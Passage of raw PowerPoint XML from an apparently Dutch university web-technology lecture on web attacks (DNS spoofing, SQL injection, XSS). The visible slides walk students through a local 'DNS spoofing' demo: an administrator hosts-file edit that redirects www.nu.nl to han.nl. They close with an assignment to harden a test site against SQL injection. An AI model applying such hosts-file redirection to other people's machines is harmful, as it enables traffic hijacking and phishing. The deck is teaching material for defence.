              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Neem maatregelen om de testwebsite zoals tijdens de demo's is gebruikt, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi-proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> te maken. Het hoeft niet heel sophisticated, maar probeer een paar maatregelen te nemen dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> niet meer zo makkelijk mogelijk maakt. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>maak eventueel gebruik van google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Test of de maatregelen werken. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                         </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="594693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0353" y="3208344"/>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web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9174" y="2652191"/>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947" y="2718642"/>
            <a:ext cx="3177096" cy="2271625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Tekstvak 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927250" y="2194600"/>
            <a:ext cx="1287870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yahoo.com</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3132127" y="5067158"/>
            <a:ext cx="4406593" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>In deze demo wordt je naar een andere website gestuurd dan die je voor ogen had.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Je gaat zo naar www.nu.nl maar je komt uit op www.han.nl!!!</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hack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9282" y="5232400"/>
            <a:ext cx="909429" cy="9094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black serv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972" y="5139401"/>
            <a:ext cx="749144" cy="1095425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Tekstvak 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7899670" y="4665434"/>
            <a:ext cx="1623150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>marktplaats.nl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1210696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28" name="Tekstvak 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185728" y="1077274"/>
            <a:ext cx="3503220" cy="800219"/>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b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" smtClean="0"/>
              <a:t>deze demo kan alleen op een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1400" dirty="0" smtClean="0"/>
              <a:t> machine. Mocht je Linux of MAC-OS hebben, schuif aan bij iemand met Windows</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Tekstvak 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528320" y="1991360"/>
            <a:ext cx="11297506" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> als </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open de file: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C:\WINDOWS\System32\Drivers\etc\hosts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>kies rechtsonder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ipv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t> de default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Documents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Laat de file even voor wat hij is.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>Je gaat de file in een latere stap pas veranderen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2562796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Stap 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Prompt (      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ R +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> ,of via het menu) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Tik het volgende commando in :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Kijk naar de output en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" u="sng" dirty="0" smtClean="0"/>
              <a:t>noteer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP-adres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>gepinged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>wordt</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Open een browser (IE, Chrome....) en ga naar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.nu.nl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>(het openingsscherm van nu.nl verschijnt)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Afbeeldingsresultaat voor windows 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504" y="2028934"/>
            <a:ext cx="521335" cy="520249"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="3368060"/>
            <a:ext cx="6390640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping www.han.nl</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3318765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"DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>" attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO</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Stap 7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Breng de focus terug op de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> file die in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> geopend was</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Voeg onderaan de volgende entry toe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Op de plek waar hierboven </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>91.211.72.194</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> staat moet het eerder </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>               genoteerde IP adres komen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Sla het bestand op.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Tekstvak 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060873" y="3455161"/>
            <a:ext cx="4009293" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>91.211.72.194  www.nu.nl</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282230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ICA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a presentation 16-9" id="{D3287398-E640-8A4A-8181-66D783BF0C61}" vid="{09601997-88CA-0F43-A6C7-6D796F159C1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22EFC5F6A45A42AABBFD279E0D1267" ma:contentTypeVersion="0" ma:contentTypeDescription="Een nieuw document maken." ma:contentTypeScope="" ma:versionID="29c230326bd1bb89b00e7a4f6aa74cec">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584E85-B96B-4F03-91D9-12E8ED501A98}">
  <ds:schemaRef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331C5A02-BAA2-4CA0-A60D-0D647F86E4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E686C2C-14BB-4DBE-9213-EF569AA5F5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16725</TotalTime>
  <Words>4449</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breedbeeld</PresentationFormat>
  <Paragraphs>680</Paragraphs>
  <Slides>54</Slides>
  <Notes>52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54</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="60" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Helvetica Neue Light</vt:lpstr>
      <vt:lpstr>ICA 16-9</vt:lpstr>
      <vt:lpstr>Web Technologie</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Het algemene plaatje </vt:lpstr>
      <vt:lpstr>"The man in the middle" attack</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack DEMO</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack DEMO</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack DEMO</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack DEMO</vt:lpstr>
      <vt:lpstr>"DNS spoofing" attack DEMO</vt:lpstr>
      <vt:lpstr>"SQL Injection" attack</vt:lpstr>
      <vt:lpstr>"Cross Site Scripting (XSS)" attack</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Het gebruikelijke mechanisme</vt:lpstr>
      <vt:lpstr>Het gebruikelijke mechanisme</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Test opstelling maken</vt:lpstr>
      <vt:lpstr>Test opstelling maken</vt:lpstr>
      <vt:lpstr>Voorbereiding: php files bekijken.</vt:lpstr>
      <vt:lpstr>Voorbereiding: php files bekijken.</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>"Illegaal inloggen" DEMO</vt:lpstr>
      <vt:lpstr>"Illegaal inloggen" DEMO</vt:lpstr>
      <vt:lpstr>"Illegaal inloggen" DEMO</vt:lpstr>
      <vt:lpstr>"Illegaal inloggen" DEMO</vt:lpstr>
      <vt:lpstr>"Illegaal inloggen" DEMO</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Voorbereiding: php files bekijken.</vt:lpstr>
      <vt:lpstr>Voorbereiding: de loginbox.</vt:lpstr>
      <vt:lpstr>Voorbereiding: de loginbox.</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>PowerPoint-presentatie</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Voorbereiding: de loginbox.</vt:lpstr>
      <vt:lpstr>Voorbereiding: Vooronderzoek.</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>"beschadigen van informatie" DEMO</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Voorbereiding: Vooronderzoek.</vt:lpstr>
      <vt:lpstr>"manipuleren van een website" DEMO</vt:lpstr>
      <vt:lpstr>"manipuleren van een website" DEMO</vt:lpstr>
      <vt:lpstr>"manipuleren van een website" DEMO</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>Voorbereiding:</vt:lpstr>
      <vt:lpstr>"Toegang verschaffen" DEMO</vt:lpstr>
      <vt:lpstr>"Toegang verschaffen" DEMO</vt:lpstr>
      <vt:lpstr>Onderwerpen </vt:lpstr>
      <vt:lpstr>SQL injection voorkomen</vt:lpstr>
      <vt:lpstr>       SQL injection nog steeds nr 1 </vt:lpstr>
      <vt:lpstr>Opdracht: voorkom SQLi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Hendrik Postma</dc:creator>
